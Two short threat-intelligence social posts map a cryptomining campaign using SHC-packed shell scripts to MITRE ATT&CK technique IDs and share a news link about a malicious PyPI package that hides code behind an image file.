Félix BrezoJan 5, 2023

From a #ThreatIntelligence perspective, the #TTPs would be:

- #T1059.003: Command and Scripting Interpreter: Unix Shell. SHC payloads to be run still need a shell to be identified in the system and that the code inside the payload is, in fact, a shell script.
- #T1027.002: Obfuscated Files or Information: Software Packed with #SHC.
- #T1622: Debugger Evasion by using SHC with '-r'.
- #T1105: Ingress Tool Transfer by downloading payloads from Github.
- #T1496: Resource Hijacking with #XMRig.

OlivNov 10, 2022
Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File https://thehackernews.com/2022/11/researchers-uncover-pypi-package-hiding.html #infosec #cybersec #T1027.003 #T1027 #T1105
Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File

Researchers have discovered a new malicious package on the PyPI repository that uses obfuscation to hide its malicious code.

The Hacker News